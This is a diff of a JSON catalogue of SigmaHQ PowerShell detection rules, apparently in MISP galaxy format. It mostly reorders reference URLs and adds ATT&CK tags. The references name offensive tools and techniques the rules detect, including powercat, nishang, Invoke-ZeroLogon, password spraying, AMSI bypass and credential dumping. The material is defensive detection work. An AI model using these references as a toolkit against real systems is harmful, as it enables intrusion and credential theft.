@@ -26619,9 +26984,9 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://nmap.org/ncat/", "https://github.com/besimorhino/powercat", + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ @@ -26654,9 +27019,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -26876,8 +27241,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ 
@@ -27219,9 +27584,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -27254,9 +27619,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/ADModule", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", + "https://github.com/samratashok/ADModule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml" ], "tags": [ 
@@ -27608,24 +27973,24 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/ADRecon", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://adsecurity.org/?p=2921", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/AzureADRecon", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/adrecon/ADRecon", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://adsecurity.org/?p=2921", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + 
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" ], "tags": [ 
@@ -27990,23 +28355,23 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/HarmJ0y/DAMP", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/samratashok/nishang", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/NetSPI/PowerUpSQL", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/besimorhino/powercat", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/PowerShellMafia/PowerSploit", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + 
"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" ], "tags": [ @@ -28429,8 +28794,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", + "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" ], "tags": [ @@ -28486,8 +28851,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ @@ -28520,8 +28885,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ 
@@ -28797,8 +29162,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" ], "tags": [ @@ -28864,9 +29229,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ @@ -28899,8 +29264,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ 
@@ -29018,9 +29383,9 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://powersploit.readthedocs.io/en/stable/Recon/README", "https://adsecurity.org/?p=2277", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -29128,8 +29493,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], 
@@ -29163,9 +29528,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -29233,8 +29598,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ 
@@ -29400,11 +29765,11 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://woshub.com/manage-windows-firewall-powershell/", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ @@ -29437,8 +29802,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ 
@@ -29594,10 +29959,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -29790,8 +30155,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1620" + ] }, + "related": [ + { + "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", "value": "Potential In-Memory Execution Using Reflection.Assembly" }, 
@@ -29884,9 +30261,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
  "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
  "https://adsecurity.org/?p=2604",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml"
  ],
  "tags": [
@@ -30202,8 +30579,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
  "https://twitter.com/WindowsDocs/status/1620078135080325122",
+ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml"
  ],
  "tags": [
@@ -30462,8 +30839,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/NathanMcNulty/status/1569497348841287681",
  "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps",
+ "https://twitter.com/NathanMcNulty/status/1569497348841287681",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml"
  ],
  "tags": [
@@ -30661,9 +31038,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/samratashok/ADModule",
  "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
  "https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml"
  ],
  "tags": [
@@ -30688,8 +31065,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1",
  "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319",
+ "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml"
  ],
  "tags": [
@@ -30723,8 +31100,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md",
  "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml"
  ],
  "tags": [
@@ -31115,8 +31492,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://o365blog.com/aadinternals/",
  "https://github.com/Gerenios/AADInternals",
+ "https://o365blog.com/aadinternals/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml"
  ],
  "tags": [
@@ -31371,8 +31748,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml"
  ],
  "tags": [
@@ -31405,8 +31782,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md",
  "https://www.offensive-security.com/metasploit-unleashed/timestomp/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml"
  ],
  "tags": [
@@ -31472,8 +31849,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine",
  "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml"
  ],
  "tags": [
@@ -31506,8 +31883,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml"
  ],
  "tags": [
@@ -31540,8 +31917,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
  "https://attack.mitre.org/datasources/DS0005/",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml"
  ],
  "tags": [
@@ -31574,8 +31951,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/",
  "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml"
  ],
  "tags": [
@@ -31598,8 +31975,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml"
  ],
  "tags": [
@@ -31655,9 +32032,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/oroneequalsone/status/1568432028361830402",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
  "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
+ "https://twitter.com/oroneequalsone/status/1568432028361830402",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml"
  ],
  "tags": [
@@ -31726,8 +32103,20 @@
  "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml"
  ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1132.001"
+ ]
  },
+ "related": [
+ {
+ "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
  "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce",
  "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script"
  },
@@ -31777,9 +32166,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
  "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
  "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml"
  ],
  "tags": [
@@ -31812,8 +32201,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
  "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
  "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml"
  ],
@@ -31880,8 +32269,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA",
  "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/",
+ "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml"
  ],
  "tags": [
@@ -32117,8 +32506,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
  "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2",
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml"
  ],
  "tags": [
@@ -32186,8 +32575,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/nas_bench/status/1537919885031772161",
  "https://lolbas-project.github.io/lolbas/Binaries/Msdt/",
+ "https://twitter.com/nas_bench/status/1537919885031772161",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml"
  ],
  "tags": [
@@ -32220,9 +32609,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md",
- "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
+ "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer",
+ "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml"
  ],
  "tags": [
@@ -32263,8 +32652,8 @@
